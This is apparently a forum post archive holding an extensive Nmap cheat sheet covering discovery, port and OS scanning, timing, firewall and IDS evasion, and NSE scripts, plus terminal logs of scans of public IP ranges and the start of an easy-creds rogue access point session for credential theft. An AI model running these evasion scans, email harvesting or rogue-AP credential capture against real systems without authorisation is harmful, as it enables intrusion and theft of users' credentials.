Show Posts
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
************************
Basic Scanning Overview
************************
- Firewalls, routers, proxy servers, and other security devices.
- Some scanning options require elevated privileges.
1. Scan a Single Target
2. Scan Multiple Targets
3. Scan a Range of IP Address
4. Scan an Entire Subnet
5. Scan a List of Targets
6. Scan Random Targets
7. Exclude Targets from a Scan
8. Exclude Targets Using a List
9. Perform an Aggressive Scan
10. Scan an IPv6 Target
1. Scan a Single Target
//-- nmap 192.168.1.1 --//
A default Nmap scan will check for the 1000 most commonly used TCP/IP ports.
Port states:
open / closed / filtered / unfiltered / open|filtered / closed|filtered
2. Scan Multiple Targets
//-- nmap 192.168.1.1 192.168.1.2 192.168.1.3 --//
//- nmap 192.168.1.136,139,150 -//
Nmap can be used to scan multiple hosts at the same time.
3. Scan a Range of IP Address
//-- nmap 192.168.1.1-10 --//
//-- nmap 192.168.1-100.* --//
The asterisk is a wildcard character which represents all valid ranges from 0-255.
4. Scan an Entire Subnet
//-- nmap 192.168.1.1/24 --//
5. Scan a List of Targets
//-- nmap -iL hosts_list.txt --//
--------hosts_list.txt--------
192.168.1.1
192.168.1.2
192.168.1.3
Each entry in [hosts_list.txt] must be separated by a space, tab, or newline.
6. Scan Random Targets
//-- nmap -iR 3 --//
Nmap will randomly generate the specified number of targets and attempt to scan them.
7. Exclude Targets from a Scan
//-- nmap 192.168.1.1/24 --exclude 192.168.1.100,192.168.1.108 --//
//-- nmap 192.168.1.1/24 --exclude 192.168.1.100-108 --//
--exclude option acceptes single hosts, ranges, or entire network blocks(using CIDR notation)
8. Exclude Targets Using a List
//-- nmap 192.168.1.1/24 --excludefile hosts_list.txt --//
--------hosts_list.txt--------
192.168.1.10
192.168.1.20
192.168.1.30
9. Perform an Aggressive Scan
//-- nmap -A 192.168.1.1 --//
10. Scan an IPv6 Target
//-- nmap -6 fe80:29aa:9db9:4164:d80e --//
******************
Discovery Options
******************
Before port scanning a target, Nmap will attempt to send ICMP echo requests to see if the host is "alive".
This can save time when scanning multiple hosts as Nmap will not waste time attemping to probe hosts that
are not online.
Beause ICMP requests are often blocked by firewalls, Nmap will also attempt to connect to port 80 and 443
since these common web server ports are often open (even if ICMP is not).
The default discovery options aren't useful when scanning secured systems and can hinder scanning progress.
1. Don't ping ---- [-Pn]
2. Perform a Ping Only Scan ---- [-sn/-sP]
3. TCP SYN Ping ---- [-PS]
4. TCP ACK Ping ---- [-PA]
5. UDP Ping ---- [-PU]
6. SCTP Ping ---- [-PY]
7. ICMP Echo Ping ---- [-PE]
8. ICMP Timestamp Ping ---- [-PP]
9. ICMP Address Mask Ping ---- [-PM]
10. IP Protocol Ping ---- [-PO]
11. ARP Ping ---- [-PR]
12. Traceroute ---- [--traceroute]
13. Force Reverse DNS Resolution ---- [-R]
14. Disable Reverse DNS Resolution ---- [-n]
15. Alternative DNS Lookup ---- [--system-dns]
16. Manually Specify DNS Server(s) ---- [--dns-servers]
17. Create a Host List ---- [-sL]
1. Don't Ping
//-- nmap -Pn 192.168.1.1 --//
By default, Nmap will first ping the target to see if it is online.
This feature helps save time when scanning as it causes targets that do not respond to be skiiped.
By specifying the [-Pn] option, Nmap is able to produce a list of open ports on the unpingable system.
2. Ping Only Scan
//- nmap -sn 192.168.1.1 -//
//- nmap -sP 192.168.1.1 -//
//- nmap -sn -PE -PP -PS443 -PA80 192.168.1.1 -//
ICMP Ping + TCP[SYN--->443]+TCP[ACK---->80]
[-sn] is much power than [-sP]. For Example:
------------ [-sP] -------------
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-21 08:21 EST
Nmap scan report for localhost (192.168.1.1)
Host is up (0.0062s latency).
MAC Address: 78:A1:06:xx:xx:xx (Unknown)
Nmap scan report for localhost (192.168.1.100)
Host is up (0.00058s latency).
MAC Address: 60:D8:19:xx:xx:xx (Hon Hai Precision Ind. Co.)
Nmap scan report for localhost (192.168.1.107)
Host is up.
Nmap scan report for localhost (192.168.1.198)
Host is up (0.0085s latency).
MAC Address: EC:17:2F:xx:xx:xxF (Unknown)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.90 seconds
------------ [-sn] -------------
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-21 08:21 EST
Nmap scan report for localhost (192.168.1.1)
Host is up (0.0083s latency).
MAC Address: 78:A1:06:xx:xx:xx (Unknown)
Nmap scan report for localhost (192.168.1.100)
Host is up (0.00049s latency).
MAC Address: 60:D8:19:xx:xx:xx (Hon Hai Precision Ind. Co.)
Nmap scan report for localhost (192.168.1.102) -------------------- [Attention Here]
Host is up (0.056s latency).
MAC Address: E0:CA:94:xx:xx:xx (Askey Computer)
Nmap scan report for localhost (192.168.1.107)
Host is up.
Nmap scan report for localhost (192.168.1.198)
Host is up (0.028s latency).
MAC Address: EC:17:2F:xx:xx:xx (Unknown)
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.04 seconds
3. TCP SYN Ping
//- nmap -PS22,25,80,443 192.168.1.1 -//
The TCP SYN ping sends a SYN packet to the target system and listens for a response.
This alternative discovery method is useful for systems that are configured to block standard ICMP pings.
The default port for [-PS] is 80. Twice for 80.
4. TCP ACK Ping
//- nmap -PA 192.168.1.1 -// -----> port scan
//- nmap -sn -PA 192.168.1.1 -// -----> no port scan
This method attempts to discover hosts by responding to TCP connections that are nonexistent in an attempt
to solicit a response from the target. It is useful in situations where standard ICMP pings are blocked.
The default port for [-PA] is 80.
5. UDP Ping
//- nmap -sn -PU 192.168.1.1 -// ------> port: 40125
//- nmap -PU22,25,80,443 192.168.1.1 -//
//- nmap -sn -PU135,137,138,445 192.168.1.1 -//
While most firewalled systems will block this type of connection,
some poorly configured systems may allow it if they are only configured to filter TCP connections.
The default port for [-PU] is 40125.
6. SCTP INIT Ping
//- nmap -PY 192.168.1.1 -//
This discovery method attempts to locate hosts using the Stream Control Transmission Protocol (SCTP).
SCTP is typically used on systems for IP based telephony.
The default port for [-PY] is 80.
7. ICMP Echo Ping
//- nmap -PE 192.168.1.1 -//
//- nmap -sn -PE www.baidu.com/24 -// ----- XXXXXXX
//- fping -c 1 -g 119.75.217.1 119.75.217.255 -// ----- more avaliable hosts
[-PE] option is automatically implied if no other ping options are specified.
8. ICMP Timestamp Ping
//- nmap -sn 192.168.1.1 -// ----- port scan
//- nmap -sn -PP 192.168.1.1 -// ----- no port scan
When most firewalled systems are configured to block ICMP echo requests,
some improperly configured systems may still reply to ICMP timestamp requests.
9. ICMP Address Mask Ping
//- nmap -PM 192.168.1.1 -// ----- port scan
//- nmap -sn -PM 192.168.1.1 -// ----- no port scan
This type of ping can occasionally sneak past a firewall that is configured to block standard echo requests.
10. IP Protocol Ping
//- nmap -PO1,2,4 192.168.1.1 -//
An IP protocol ping sends packets with the specified protocol to the target.
If no protocols are specified, the default protocols 1(ICMP), 2(IGMP), 4(IP-in-IP) are used.
A complete list of Internet Protocol numbers ----
http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml
11. ARP Ping ---- option removed
//- nmap -PR 192.168.1.1 -//
ARP scans cannot be performed on targets that are not on your local subnet.
12. Traceroute
//- nmap --traceroute scanme.insecure.org --//
The information displayed is similar to the traceroute or tracepath commands.
13. Force Reverse DNS Resolution
//- nmap -R 173.194.127.56 -//
+++++++++++++++++++++++++++++++++++++++++++++++++
Nmap scan report for hkg03s10-in-f24.1e100.net (173.194.127.56)
Host is up (0.012s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds
+++++++++++++++++++++++++++++++++++++++++++++++++
By default, Nmap will only do reverse DNS for hosts that appear to be online.
The [-R] option is useful when performing reconnaissance on a block of IP address
as Nmap will try to resolve DNS information of every IP address.
The reverse DNS information can reveal interesting information about the target IP
address (even if it is offline or blocking Nmap's probes).
14. Disable Reverse DNS Resolution
//- nmap -n 173.194.127.56 -//
++++++++++++++++++++++++++++++++++++++++++++++
Nmap scan report for 173.194.127.56
Host is up (0.011s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 5.06 seconds
++++++++++++++++++++++++++++++++++++++++++++++
Using the -n option greatly reduces scanning times -
especially when scanning a large number of hosts.
15. Alternative DNS Lookup Method
//- nmap --system-dns 173.194.127.56 -//
Use the host system's DNS resolver instead of its own internal method.
This option is rarely used as it is much slower than the default method.
It can be useful when troubleshooting DNS problems with Nmap.
The system resolver is always used for IPv6 scans
as Nmap has not yet fully implemented its own internal IPv6 resolver.
16. Manually Specify DNS Server(s)
//- nmap --dns-servers 8.8.8.8,8.8.8.4 173.194.127.56-//
Nmap's default behavior will use the DNS servers configured on your local system for name resolution.
17. Create a Host List
//- nmap -sL 173.194.127.1/24 -//
This scan is useful for identifying the IP addresses and DNS names for the specified targets without
sending any packets to them. Many DNS names can reveal interesting information about an IP address including
what it used for or where it is located.
*************************
Advanced Scanning Options
*************************
Nmap supports a number of user selectable scan types. By default, Nmap will perform a basic TCP scan on each system.
In some situations, it may be necessary to perform more complex TCP (or even UDP) scans in an attempt to find
uncommon services or evade a firewall.
You must login with root/administrator privileges to execute many of the scans discussed in this section.
At Default, Nmap sends some signal characters. For Example:
nmap -sU -p 135 192.168.1.1 ------------ signal characters [Malformed Packet: BT-uTP]
nmap -sU -p 135 --data-length 40 192.168.1.1
1. TCP SYN Scan --------- [-sS]
2. TCP Connect Scan --------- [-sT]
3. UDP Scan --------- [-sU]
4. TCP NULL Scan --------- [-sN]
5. TCP FIN Scan --------- [-sF]
6. Xmas Scan --------- [-sX]
7. TCP ACK Scan --------- [-sA]
8. Custom TCP Scan --------- [--scanflags]
9. IP Protocol Scan --------- [-sO]
10. Send Raw Ethernet Packets --------- [--send-eth]
11. Send IP Packets --------- [--send-ip]
1. TCP SYN Scan
//- nmap -sS 192.168.1.1 -//
The TCP SYN scan is default option for privileged users (root or administrators).
The default TCP SYN scan attempts to identify the 1000 most commonly used TCP ports by sending SYN packet
to he target and listening for a response.
This type of scan is said to be stealthy because it does not attempt to open a full-fledged connection to
the remote host.
This prevents many systems from logging a connection attempt from your scan.
2. TCP Connect Scan
//- nmap -sT 192.168.1.1 -//
The [-sT] scan is the default scan type for non-privileged users.
3. UDP Scan
//- nmap -sU 192.168.1.1 -//
While TCP is the most commonly used protocol, many network services (like DNS, DHCP, and SNMP) still utilize UDP.
4. TCP NULL Scan
//- nmap -sN 192.168.1.1 -//
A TCP NULL scan causes Nmap to send packets with no TCP flags enabled.
This is done by setting the packet header to 0. Sending NULL packets to a target is a method of tricking a firewalled
system to generate a respomse.
5. TCP FIN Scan
//- nmap -sF 192.168.1.1 -//
In a [-sF] scan, Nmap marks the TCP FIN bit active when sending packets in an attempt to solicit a TCP ACK from the target.
This is another method of sending unexpected packets to a target in an attempt to produce results from a system protected
by a firewall.
6. Xmas Scan
//- nmap -sX 192.168.1.1 -//
Nmap sends packets with URG, FIN, and flags activted. This has the effect of "lighting the packet up like a Christmas tree"
and can occasionally solicit a response from a firewalled system.
Not all systems will respond to probes to this type.
7. Custom TCP Scan
//- nmap --scanflags SYNURG 192.168.1.1 -//
+++++++++++++++++++++++++++++++++++++++++++
[ Flag ] [Usage]
SYN Synchronize
ACK Acknowledgment
PSH Push
URG Urgent
RST Reset
FIN Finished
8. TCP ACK Scan
//- nmap -sA 192.168.1.1 -//
When performing a TCP ACK scan, Nmap will probe a target and look for RST responses.
If no responses is received the system is considered to be filtered.
If the system does return an RST packet, then it is labeled as unfiltered.
9. IP Protocol Scan
//- nmap -sO 192.168.1.1 -//
The IP protocol scan displays the IP protocols that are supported on the target system.
The most commonly found protocols on modern are ICMP, TCP, UDP.
Using the [-sO] option is helpful for quickly identifying what types of scans you want
to perform on the selected target system based on its supported protocols.
10. Send Raw Ethernet Packets
//- nmap --send-eth 192.168.1.1 -//
Enabling this option instructs Nmap to bypass the IP layer on your system and send raw
ethernet packets on the data link layer. This can be used to overcome problems with
your system's IP stack.
11. Send IP Packets
//- nmap --send-ip 192.168.1.1 -//
Enabling this option forces Nmap to scan using the local system's IP stack instead of
generating raw ethernet packets.
*********************
Port Scanning Options
*********************
There are a total of 131,070 TCP/IP ports (65,535 TCP and 65,535 UDP).
Nmap, by default, only scans 1,000 of the most commonly used ports.
This is done to save time when scanning multiple targets as the majority of ports outside the top
1000 are rarely used. Sometimes, however, you may want to scan outside the default range of ports
to look for uncommon services or ports that have been forwarded to a different location.
1. Perform a Fast Scan ------ [-F]
2. Scan Specific Ports ------ [-p port]
3. Scan Ports by Nmae ------ [-p name]
4. Scan Ports by Protocol ------ [-p U:[UDP ports],T:[TCP ports]]
5. Scan All Ports ------ -p "*"
6. Scan Top Ports ------ --top-ports [number]
7. Perform a Sequential Port Scan ------ -r
8. Scan ports more common than <ratio -- decimal number between 0 and 1> ------ [--port-ratio]
1. Perform a Fast Scan
//- nmap -F 192.168.1.1 -//
Nmap scans the top 1000 commonly used ports by default.
The [-F] option reduces that number to 100.
2. Scan Specific Ports
//- nmap -p 80 192.168.1.1 -//
//- nmap -p 25,53,80-200 192.168.1.1 -//
//- nmap -p- 192.168.1.1 -//
3. Scan Ports by Name
//- nmap -p ftp,smtp,http 192.168.1.1 -//
//- nmap -p "http*" 192.168.1.1 -//
The name(s) specified must match a service in the nmap-services file.
[/usr/local/share/nmap] or [C:\Program Files\Nmap]
4. Scan Ports by Protocol
//- nmap -sU -sT -p U:53,T:25 192.168.1.1 -//
Specifying a [T:] or [U:] prefix with the -p option allows you to search for a specific port and protocol combination.
Nmap, by default, will only scan TCP ports. In order to scan both TCP and UDP ports,
you will need to enable additional scan types such as [-sU] and [-sT].
5. Scan All Ports
//- nmap -p "*" 192.168.1.1 -//
6. Scan Top Ports
//- nmap--top-ports 10 192.168.1.1 -//
By default, Nmap will scan the 1000 most commonly used ports.
7. Perform a Sequential Port Scan
//- nmap -r 192.168.1.1 -//
Nmap's default scanning algorithm randomizes the port scan order.
This is useful for evading firewalls and intrusion prevention systems.
8. Scan ports more common than <ratio -- decimal number between 0 and 1>
//- nmap --port-ratio 0.5 192.168.1.1 -//
***************************************
Operating System and Service Detection
***************************************
The process of identifying a target's operating system and software version is known as TCP/IP fingerprinting.
1. Operating System Detection ------ [-O]
2. Attempt to Guess an Unknown OS ------ [--osscan-guess]
3. Service Version Detection ------ [-sV]
4. Troubleshooting Version Scans ------ [--version-trace]
5. Perform an RPC Scan ------ [-sR]
6. Set from 0 (light) to 9 (try all probes) ------ [--version-intensity]
7. Limit to most likely probes (intensity 2) ------ [--version-light]
8. Try every single probe (intensity 9) ------ [--version-all]
1. Operating System Detection
//- nmap -O 192.168.1.1 -//
In order for OS detection to work properly there must be at least one open and one closed port on the target
system. When scanning multiple targets, the [--osscan-limit] option can be combined with [-O] to instruct Nmap
not to OS scan hosts that do not meet this criteria.
If Nmap is unable to determine the operating system on a target, it will provide a fingerprint which can be to
Nmap's OS database at www.nmap.org/submit/
2. Attempt to Guess an Unknown Operating System
//- nmap -O --osscan-guess 192.168.1.1 -//
If Nmap is unable to identify the OS, you can force it to guess by using the option.
3. Service Version Detection
//- nmap -sV 192.168.1.1 -//
Nmap version detection purposely skips some problematic ports (specifically 9100-9107).
4. Troubleshooting Version Scans
//- nmap -sV --version-trace 192.168.1.1 -//
5. Perform an RPC Scan
WARNING: -sR is now an alias for -sV and activates version detection as well as RPC scan.
6. Set from 0 (light) to 9 (try all probes)
//- nmap -Pn -sS -sV --version-intensity 0 -p 135 192.168.1.1 -//
**************
Timing Options
**************
When scanning a large number of hosts on a fast network you may want to increase the number
of parallel operations to get faster results.
When scanning show networks (or across the internet) you may want to slow down a scan to get
more accurate results or to evade intrusion detection systems. This section discusses the option
available for these timing features.
1. Timing Templates ------ -T[0-5]
2. Set the Packet TTL ------ --ttl
3. Minimun # of Parallel Operations ------ --min-parallelism
4. Maximum # of Parallel Operations ------ --max-parallelism
5. Minimum Host Group Size ------ --min-hostgroup
6. Maximum Host Group Size ------ --max-hostgroup
7. Maximum RTT Timeout ------ --max-rtt-timeout
8. Initial RTT Timeout ------ --initial-rtt-timeout
9. Maximum Retries ------ --max-retries
10. Host Timeout ------ --host-timeout
11. Minimum Scan Delay ------ -scan-delay
12. Maximum Scan Delay ------ --max-scan-delay
13. Minimum Packet Rate ------ --min-rate
14. Maximum Packet Rate ------ --max-rate
15. Defeat Reset Rate Limits ------ --defeat-rst-ratelimit
Timing Parameters
Nmap timing parameters are accepted as millseconds by default.
You can also specify parameters in seconds, minutes, or hours by appending a qualifier to the time argument.
(none) ---- Milliseconds [500, 500 milliseconds]
s ---- Seconds [300s, 300 seconds]
m ---- Minutes [5m, 5 minutes]
h ---- hours [1h, 1 hour]
1. Timing Templates
//- nmap -T[0-5] 192.168.1.1 -//
-T0 ---- paranoid ---- Extremely slow
-T1 ---- sneaky ---- Useful for avoiding intrusion detection systems
-T2 ---- polite ---- Unlikely to interfere with the target system
-T3 ---- normal ---- This is the default timing template
-T4 ---- aggressive ---- Produces faster results on local networks
-T5 ---- insane ---- Very fast and aggressive scan
2. Set the Packet TTL
//- nmap --ttl 500 scanme.insecure.org -//
This option is useful when scanning targets on slow connections where normal packets may time out before receiving a response.
3. Minimum Number of Parallel Operations
//- nmap -sn -PE --min-parallelism 100 192.168.1.1/24 -//
The [--min-parallelism] option is used to specify the minimum number of parallel port scan operations
Nmap should perform at any given time.
Nmap automatically adjusts parallel scanning options based on network conditions.
While manually setting the [--min-parallelism] option may increase scan performance,
setting it too high may produce inaccurate results.
4. Maximum Number of Parallel Operations
//- nmap -sn -PE --max-parallelism 10 192.168.1.1/24 -//
5. Minimum Host Group Size
//- nmap --min-hostgroup 30 192.168.1.1/24 -//
Nmap will perform scans in parallel to save time when scanning multiple targets such as a range or entire subnet.
6. Maximum Host Group Size
//- nmap --max-hostgroup 10 192.168.1.1/24 -//
In contrast to the --min-hostgroup option, the --max-hostgroup option controls the maximum number of hosts in a group.
This option is helpful if you want to reduce the load on a network or to avoid triggering any red flags with various
network security products.
7. Initial RTT Timeout
//- nmap --initial-rtt-timeout 5000 scanme.insecure.org -//
The default timming template (-T3) has an --initial-rtt-timeout value of 1000 milliseconds.
Increasing the value will reduce the number of packet retransmissions due to timeouts.
By decreasing the value you can speed up scans; but do so with caution.
Setting the RTT timeout value too low can negate any potential performance gains and lead to
inaccurate results.
8. Maximum RTT Timeout
//- nmap --max-rtt-timeout 400 scanme.insecure.org -//
Nmap dynamically adjusts RTT timeout options for best results by default.
The default maximum RTT timeout is 10 seconds. Manually adjusting the maximum RTT timeout lower will allow for faster scan
times (especially when scannning large blocks of addresses).
Specifying a high maximum RTT timeout will prevent Nmap from give up too soon when scanning over slow/unreliable connections.
9. Maximum Retries
//- nmap --max-retries 2 scanme.insecure.org -//
By default, Nmap will automatically adjust the number of probe retransmissions based on network conditions.
10. Host Timeout
//- nmap --host-timeout 1m 192.168.1.1 -//
A host may take a long time to scan if it is located on a slow or unreliable network.
Systems that are protected by rate limiting firewalls may also take a considerable amount of time to scan.
In the above example, the scan takes longer than one minute to complete which causes Nmap to terminate the scan.
11. Minimum Scan Delay
//- nmap --scan-delay 5s scanme.insecure.org -//
12. Maximum Scan Delay
//- nmap --max-scan-delay 300 scanme.insecure.org -//
13. Minimum Packet Rate
//- nmap --min-rate 30 scanme.insecure.org -//
The [--min-rate] option is used to specify the minimum number of packets Nmap should send per second.
14. Maximum Packet Rate
//- nmap --max-rate 30 scanme.insecure.org -//
//- nmap --max-rate 0.1 scanme.insecure.org -// ----- send one packet every ten seconds.
The [--max-rate] option is used to specify the maximum number of packets Nmap should send per second.
15. Defeat Reset Rate Limits
//- nmap --defeat-rst-ratelimit scanme.insecure.org -//
The [--defeat-rst-ratelimit] is used to defeat targets that apply rate limiting to RST (reset) packets.
******************
Evading Firewalls
******************
Firewalls and Intrusion prevention systems are designed to prevent tools like Nmap from getting an accurate picture of the systems.
1. Fragment Packets ---- [-f]
2. Specify a Specific MTU ---- [--mtu]
3. Use a Decoy ---- [-D]
4. Idle Zombie Scan ---- [-sl]
5. Manually Specify a Source Port ---- [--source-port]
6. Append Random Data ---- [--data-length]
7. Randomize Target Scan Order ---- [--randomize-hosts]
8. Spoof MAC Address ---- [--spoof-mac]
9. Send Bad Checksums ---- [--badsum]
1. Fragment Packet
//- nmap -f 192.168.1.1 -//
The [-f] option instructs Nmap to send small 8-byte Packets thus fragmenting the probe into many very small packets.
This option isn't particularly useful in everyday situations; it may be helpful when attempting to evade some older
or improperly configured firewall.
Some host operating systems may require the use of [--send-eth] combined with [-f] for fragmented packets to be properly transmitted.
2. Specify a Specific MTU
//- nmap --mtu 16 192.168.1.1 -//
The [--mtu] option is similar to the [-f] option except it allows you to specify your own MTU to be used during scanning.
This creates fragemented packets that can potentially confuse some firewalls.
The MTU must be a multiple of 8 (example 8,16,24,32, etc)
3. Use a Decoy
//- nmap -D RND:10 192.168.1.1 -//
When performing a decoy scan Nmap will spoof additional packets from the specified number of decoy addresses. This effectively makes it
appear that the target is being scanned by nultiple systems simultaneously. Using decoys allows the actual source of the scan to "blend
into the crowd" which makes it harder to trace where the scan is coming from.
In the above example [nmap -D RND:10] instructs Nmap to generate 10 random decoys.
Using too many decoys can cause network congestion and reduce the effectiveness of a scan.
Additionally, some internet service providers may filter spoofed traffic which will reduce the effectiveness of using decoys to cloak scanning.
4. Idle Zombie Scan
//- nmap -sI 192.168.1.100 192.168.1.1 -//
The idle zombie scan is a unique scanning technique that allows you to exploit an idle system and use it to scan a target for you.
In order for an idle scan to be successful, the zombie system must truly be idle at the time of scanning.
5. Manually Specify a Source Port Number
This technique can be used to exploit weaknesses in firewalls that are improperly configured to blindly accept incoming traffic based
on a specific port number.
6. Append Random Data
//- nmap --data-length 25 192.168.1.1 -//
Nmap transmits packets which are generally a specific size. Some firewall vendors know to look for this type of predictable packet size.
7. Randomize Target Scan Order
//- nmap --randomize-hosts 192.168.1.1/24 -//
The [--randomize-hosts] option helps prevent scans of multiple targets from being detected by firewalls and intrusion detection systems.
This is done by scanning them in a random order instead of sequential.
8. Spoof MAC Address
//- nmap --spoof-mac [vendor|MAC|0] 192.168.1.1 -//
[0 ] -------- Generate a random MAC address
[Specific MAC Address ] -------- Uses the specified MAC address
[Vendor Name ] -------- Generates a MAC address from the specified vendor (such as Apple, Dell, 3Com, etc)
9. Send Bad Checksums
//- nmap --badsum 192.168.1.1 -//
The TCP/IP protocol uses checksums to ensure data integrity. Crafting packets with bad checksums can, in some rare occasions, produce a
response from a poorly configured system.
Only a poorly configured system would respond to a packet with a bad checksum. Nevertheless, it is a good tool to use when auditing network
security or attempting to evade firewalls.
***************
Output Options
***************
Save Output to a Text File -------- [-oN]
Save Output to a XML File -------- [-oX]
Grepable Output -------- [-oG]
Output All Supported File Types -------- [-oA]
133t Output -------- [-oS]
*****************************
Troubleshooting and Debugging
*****************************
Getting Help ---------- -h
Display Nmap Version ---------- -V
Verbose Output ---------- -v
Debugging ---------- -d
Display Port State Reason---------- --reason
Only Display Open Ports ---------- --open
Trace Packets ---------- --packet-trace
Display Host Networking ---------- -iflist
Specify a Network Interface ---------- -e
****************************
Nmap Scripting Engine (NSE)
****************************
Network discovery
More sophisticated Version detection
Vulnerability detection
Backdoor detection
Vulnerability exploitation
1. Gathering Additional Host Information
2. Auditing Web Servers
3. Auditing Databases
4. Auditing Mail Servers
5. Scanning Large Networks
6. Generating Scanning Reports
7. Writing Your Own NSE Scripts
1. Gathering Additional Host Information
1.1 Geolocating an IP address
1.2 Getting information from WHOIS records
1.3 Checking if a host is known for malicious activities
1.4 Collecting valid e-mail accounts
1.5 Discovering hostnames pointing to the same IP address
1.6 Brute forcing DNS records
1.7 Fingerprinting the Operating system of a host
1.8 Discovering UDP services
1.9 Listing protocols supported by a remote host
1.10 Discovering stateful firewalls by using a TCP ACK scan
1.11 Matching services with known security vulnerabilities
1.12 Spoofing the origin IP of a port scan
1. Gathering Additional Host Information
1.1 Geolocating an IP address
ip-geolocation-maxmind, ip-geolocation-ipinfodb, ip-geolocation-geobytes, ip-geolocation-geoplugin
ip-geolocation-geobytes ---- http://nmap.org/nsedoc/scripts/ip-geolocation-geobytes.html
ip-geolocation-geoplugin ---- http://nmap.org/nsedoc/scripts/ip-geolocation-geoplugin.html
ip-geolocation-ipinfodb ---- http://nmap.org/nsedoc/scripts/ip-geolocation-ipinfodb.html
ip-geolocation-maxmind ---- http://nmap.org/nsedoc/scripts/ip-geolocation-maxmind.html
//- nmap --script ip-geolocation-* <target> -//
1.2 Getting Information from WGOIS records
whois ---- http://nmap.org/nsedoc/scripts/whois.html
//- nmap --script whois scanme.nmap.org -//
//- nmap --script whois --script-args whois.whodb=arin+ripe+afrinic scanme.nmap.org -//
//- nmap -sn --script whois -v -iL hosts.txt -//
//- nmap -sn --script whois --script-args whois.whodb=nocache scanme.nmap.org -//
1.3 Checking if a host is known for malicious activities
//- nmap -p80 --script http-email-harvest exploit-db.com -//
//- nmap -p80 --script http-email-harvest --script-args httpspider.maxpagecount=50 exploit-db.com -//
//- nmap -p80 --script http-email-harvest --script-args httpspider.url=/welcome.php <target> -//
//- nmap -p80 --script http-google-email --script-args domain=insecure.org scanme.nmap.org -//
//- nmap -p80 --script http-google-email --script-args pages=10 scanme.nmap.org -//
1.5 Discovering hostnames pointing to the same IP address
+++++++++++++++++++++++++++++++++++++++++++++++
nmap -Pn -p 135 -S 127.0.0.1 192.168.1.136 # [LAN] ip spoof, but real MAC address.
+++++++++++++++++++++++ [ Host Discovery --- examples ] ++++++++++++++++++++++++
//- nmap -sn -PE -T3 192.168.1.100-120 -// -----> 2 hosts up
//- nmap -sn -PE -T2 192.168.1.100-120 -// -----> 3 hosts up
root@AA:~/Desktop# nmap -sn -PE -T3 192.168.1.100-120
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-27 13:29 CST
Nmap scan report for 192.168.1.102
Host is up (0.00086s latency).
Nmap scan report for 192.168.1.112
Host is up (0.0020s latency).
Nmap done: 21 IP addresses (2 hosts up) scanned in 1.77 seconds ------ 2 hosts up
root@AA:~/Desktop# nmap -sn -PE -T2 192.168.1.100-120
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-27 13:30 CST
Nmap scan report for 192.168.1.101
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.102
Host is up (0.0025s latency).
Nmap scan report for 192.168.1.112
Host is up (0.0018s latency).
Nmap done: 21 IP addresses (3 hosts up) scanned in 19.78 seconds ------ 3 hosts up
----------------------------============================================
root@AA:~# fping -a -c 2 -g 119.75.218.1/24 ------------------------ 5 hosts
119.75.218.11 : xmt/rcv/%loss = 2/1/50%, min/avg/max = 9.99/9.99/9.99
119.75.218.45 : xmt/rcv/%loss = 2/2/0%, min/avg/max = 13.0/16.6/20.2
119.75.218.70 : xmt/rcv/%loss = 2/2/0%, min/avg/max = 3.58/5.04/6.51
119.75.218.77 : xmt/rcv/%loss = 2/2/0%, min/avg/max = 7.49/7.87/8.26
119.75.218.143 : xmt/rcv/%loss = 2/2/0%, min/avg/max = 11.8/12.3/12.8
root@AA:~# fping -a -c 4 -g 119.75.218.1/24 ------------------------ 6 hosts
119.75.218.11 : xmt/rcv/%loss = 4/4/0%, min/avg/max = 3.41/12.2/21.9
119.75.218.45 : xmt/rcv/%loss = 4/4/0%, min/avg/max = 2.96/10.2/30.6
119.75.218.70 : xmt/rcv/%loss = 4/4/0%, min/avg/max = 3.41/9.08/18.0
119.75.218.77 : xmt/rcv/%loss = 4/4/0%, min/avg/max = 3.54/5.31/9.04
119.75.218.143 : xmt/rcv/%loss = 4/4/0%, min/avg/max = 8.42/11.7/15.2
119.75.218.254 : xmt/rcv/%loss = 4/1/75%, min/avg/max = 19.8/19.8/19.8
root@AA:~# nmap -sn -PE -T2 192.168.1.100-120 ------------------------- 3 hosts
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-27 13:30 CST
Nmap scan report for 192.168.1.101
Host is up (0.0012s latency).
Nmap scan report for 192.168.1.102
Host is up (0.0025s latency).
Nmap scan report for 192.168.1.112
Host is up (0.0018s latency).
Nmap done: 21 IP addresses (3 hosts up) scanned in 19.78 seconds
----------------------------============================================
root@AA:~# nmap -n -sn --data-length 56 --ttl 64 -PE 119.75.217.1/24 -------- 0 hosts up
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-28 15:35 CST
Nmap done: 256 IP addresses (0 hosts up) scanned in 52.15 seconds
root@AA:~# nmap -n -sn --data-length 56 --ttl 64 -PE 119.75.217.26 -------- 1 host up
Starting Nmap 6.01 ( http://nmap.org ) at 2014-01-28 15:38 CST
Nmap scan report for 119.75.217.26
Host is up (0.0045s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds
======================================================================================
easy-creds v3.6 11/08/2011
This script leverages tools for stealing credentials during a pen test.
*** At any time, ctrl+c to return to main menu ***
[+] Provide path for saving log files, ex. root, *NOT* /root/: /root/Desktop/
[+] Would you like to include a sidejacking attack? (y/n): n
[+] Network Interfaces:
eth0 xx:xx:xx:xx:xx:xx IP:10.0.2.15
[+] Interface connected to the internet, example eth0: eth0
[*] airmon-ng
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
[+] Wireless interface name, example wlan0: wlan0
[+] rogue AP ESSID, example FreeWiFi: Freeeeeeeee
[+] Channel, example 6 or 11: 6
[+] Monitor interface(s)
[*] airmon-ng | grep mon
mon0 Ralink RT2870/3070 rt2800usb - [phy0]
[+] Enter monitor enabled interface name, example mon0: mon0
[*] ifconfig | grep Link| grep -v lo
eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
